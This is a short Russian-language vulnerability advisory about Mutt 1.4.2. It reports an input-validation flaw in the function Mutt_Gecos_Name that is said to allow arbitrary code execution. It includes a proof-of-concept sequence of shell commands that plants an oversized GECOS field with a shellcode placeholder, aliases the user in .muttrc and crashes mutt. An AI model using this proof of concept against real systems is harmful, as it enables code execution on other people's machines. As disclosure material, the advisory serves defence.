Программа: Mutt 1.4.2

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в фнукции Mutt_Gecos_Name. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

Пример:

# USERNAME=$(perl -e ‘print "a" x 31’)
# useradd -c ‘&&&&&&&&& your-favourite-ascii-shellcode-here’ $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
# Segmentation fault (core dumped)



Оставить мнение